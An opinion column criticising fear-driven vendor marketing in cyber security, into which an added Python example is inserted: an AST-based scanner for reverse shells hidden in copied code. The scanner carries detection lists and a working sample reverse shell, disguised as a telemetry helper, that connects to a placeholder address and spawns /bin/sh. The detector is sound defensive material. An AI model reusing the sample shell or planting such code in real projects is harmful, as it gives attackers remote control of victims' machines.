Breaking the chains: How FUD is holding the cyber sector hostage
The cyber security industry must move past fear tactics and get back to the basics of good cyber security practice
Fear, uncertainty and doubt (FUD) has become an ever-looming cloud over the cyber sector in recent years as companies and suppliers pounce on the opportunity to capitalise on this rhetoric and peddle their wares to fearful customers. To misquote the age-old advertising maxim: fear sells.
Of course, the big problem with this is that customers and businesses – people – become immune to the constant avalanche of outlandish claims and equally outlandish fears. “FUD fatigue” is something that, unfortunately, I can guarantee we will see more of in 2019.
Predictions in January for the coming year are famously inaccurate – especially when it comes to cyber security. We will see this inaccuracy continue to spread across the three main product areas of cyber: antivirus suppliers desperate to get people to upgrade continually; firewall suppliers coming up with increasingly breathless claims about appliances infused with “ultra-next-gen” wizardry; and then my personal favourite – the logging and monitoring suppliers whose products by now should be so infused with AI [artificial intelligence] that surely Skynet should have manifested.
Unless a supplier is actually selling me a Knight Industries Two Thousand, AI is bunk and “quantum encryption processing engines” – an actual quote from a supplier’s sales literature – is also right up there.
There is a reason why people talk about being paralysed by fear. Supplier FUD undermines the decision-making process and subverts any well-thought-out cyber strategy. FUD is a cynical ploy to scare customers into buying whatever makes the salesperson’s quota this quarter.
Faced with headlines about ever-larger breaches and active foreign actors (both friend and foe), companies need to trust that they are making the right investments and choices in cyber security. And when I say right, what I really mean is what is appropriate and proportional to them.
Good cyber security is built on trust. You trust your team, your company, your partners and your suppliers. Dialling up the fear in a desperate attempt to meet this quarter’s sales goals helps no one.
Biggest cyber danger
The biggest cyber danger for companies is not the CFO getting hacked by Chinese wizard-class hackers using an offensive AI-driven quantum virus via blockchain – it’s someone from the accounts team clicking on that phishing email link because he did his mandatory corporate security training seven months ago and has forgotten to double-check the URL.
It could also be someone from the development team facing a tight deadline and nabbing some code from GitHub, without having the time to really read through it and find the remote shell buried in line 2,361.
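The “remote shell buried in line 2,361” is a concrete thing a reviewer can check for, even under deadline. The script below is an added example, not code from the original article: it walks a Python file with the standard-library ast module and records the calls that, taken together, form the classic shape of a reverse shell (open a socket to a remote host, redirect the standard file descriptors onto it, spawn a shell). The indicator lists and the embedded sample module are constructed for this example; the callback address 198.51.100.7 is from the documentation range and is not a real host.

```python
"""Flag the ingredients of a reverse shell hidden in copied code.

Added example (not from the original article). Any single call below is
legitimate on its own - the combination in one file is what deserves a
second look before the code is committed.
"""
import ast

# Indicator groups: assumed heuristics for this example, not an exhaustive list.
NETWORK = {"socket.socket", "socket.create_connection"}
NETWORK_METHODS = {"connect", "connect_ex"}          # matched on the method name only
REDIRECT = {"os.dup2", "pty.spawn"}
SHELL = {"subprocess.Popen", "subprocess.call", "subprocess.run",
         "os.system", "os.execv", "os.execvp"}
OBFUSCATION = {"base64.b64decode", "exec", "eval", "compile"}


def _call_name(node):
    """Return a dotted name for a Call's callee ('os.dup2', 's.connect'), or None."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        parts = []
        while isinstance(func, ast.Attribute):
            parts.append(func.attr)
            func = func.value
        if isinstance(func, ast.Name):
            parts.append(func.id)
            return ".".join(reversed(parts))
        return parts[0]  # method on an arbitrary expression: keep the outer attribute
    return None


def classify(name):
    """Map a callee name to an indicator category, or None if it is uninteresting."""
    last = name.rsplit(".", 1)[-1]
    if name in NETWORK or last in NETWORK_METHODS:
        return "network"
    if name in REDIRECT:
        return "redirect"
    if name in SHELL:
        return "shell"
    if name in OBFUSCATION:
        return "obfuscation"
    return None


def scan(source):
    """Return [(line, category, callee), ...] sorted by line number."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name is not None:
                category = classify(name)
                if category is not None:
                    findings.append((node.lineno, category, name))
    return sorted(findings)


def report(source):
    """Scan and decide: network plus redirect-or-shell in one file is the reverse-shell shape.

    Decoding-plus-exec is reported separately as 'needs_review', because a
    payload built from a string cannot be judged from the AST alone.
    """
    findings = scan(source)
    cats = {category for _, category, _ in findings}
    return {
        "findings": findings,
        "reverse_shell": "network" in cats and ("redirect" in cats or "shell" in cats),
        "needs_review": "obfuscation" in cats,
    }


# Constructed sample: a plausible helper with a reverse shell buried below it.
SAMPLE = '''\
import csv
import io


def parse_rows(text):
    """Parse CSV text into a list of dicts (benign)."""
    return list(csv.DictReader(io.StringIO(text)))


def _telemetry():
    import os
    import socket
    import subprocess
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("198.51.100.7", 4444))
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    subprocess.call(["/bin/sh", "-i"])


_telemetry()
'''

if __name__ == "__main__":
    result = report(SAMPLE)
    for line, category, name in result["findings"]:
        print(f"line {line:4d}  {category:<11} {name}")
    print("reverse shell shape:", result["reverse_shell"])
```

Run it over the sample and the four calls on lines 14, 15, 17 and 18 are listed together with the verdict. A plain HTTP client that only opens and connects a socket is not flagged, because it never redirects file descriptors or spawns a shell. The check is deliberately crude: it will miss code assembled from strings at runtime, which is why `exec`/`eval` of decoded data is surfaced for a human to read rather than judged automatically.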
Suppliers can hype and sensationalise the capabilities of their products, and the scale of the threat, but ultimately all they are doing is damaging customers’ trust – the trust that is vital for a company to know that its cyber security strategy is based on a proportional and relevant response to the threats it faces as an organisation.
It is also vital that company executives and boards do not fall prey to FUD and have a knee-jerk reaction to threats without fully understanding the threat itself and the company’s wider cyber strategy. This only comes from top-level executives learning about, and fully understanding, their company’s cyber strategy and providing the security team with the resources needed to implement it successfully.
Where do we go from here?
As an industry, we need to move past the FUD and get back to the basics of good cyber security practice. What threats does a client face? From whom? What security skills and processes do they have at the moment? How are those working out? How is success even being measured?
My main prediction, and hope, for 2019 is that organisations start to accept that, no matter what they do, they will eventually get hacked – and, in accepting that, will invest in people and processes that are relevant and proportional to those threats. Maybe they will buy some new technology, but I’d rather see organisations doing that from a position of informed trust rather than supplier-stoked terror.
In the meantime, I have this great 1982 Pontiac Trans-Am that leverages quantum blockchain technology to defeat the genetically modified Outer Mongolian hacker wizards that have undoubtedly already used psychic mind hacks to pwn your CIO. Really.